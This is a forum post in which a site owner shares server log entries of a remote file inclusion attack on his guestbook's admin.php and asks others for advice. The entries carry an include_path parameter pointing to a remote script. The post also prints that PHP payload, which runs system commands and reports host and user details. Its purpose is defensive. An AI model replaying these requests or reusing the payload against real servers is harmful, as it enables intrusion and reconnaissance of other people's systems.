Who's attacking the Wolfman?
The Wolfman was reviewing my server logs today when I came across this:
Code:
//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 404 Date: Jan 02 18:41:25 Http Version: HTTP/1.1 Size in Bytes: -
Referer: - Agent: libwww-perl/5.808
67.15.175.50
/gbook//admin.php?include_path=http://thermair.co.uk//media/logs/Goid.txt??
Http Code: 200 Date: Jan 02 18:44:32 Http Version: HTTP/1.1 Size in Bytes: 4290
Referer: - Agent: libwww-perl/5.808
67.15.175.50
It looks like someone has written a perl script that is testing my directories for the presence of an admin.php that is vulnerable to a parameter injection attack.
The second attempt actually found my gbook directory which is used by my Ghoulbook. I'm guessing the script spidered my site for admin.php. For all admin.php files discovered, it attempted the injection.
Here is the content of Goid.txt
Code:
<?
echo "IndoServ<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "IndoServ IRC NetWork<br>";
exit;
?>
It looks like Goid.txt is trying to display information about my server and my user account.
http://thermair.co.uk/ is an Air treatment company in the UK. They are probably unaware that there site is being used to harbour internet attacks against web servers.
A search of the source IP address 67.15.175.50 shows that others have also been attacked.
So here are my questions:
1) Has anyone seen this before?
2) Do you think the Wolfman should notify the Air Treatment company?
Thanks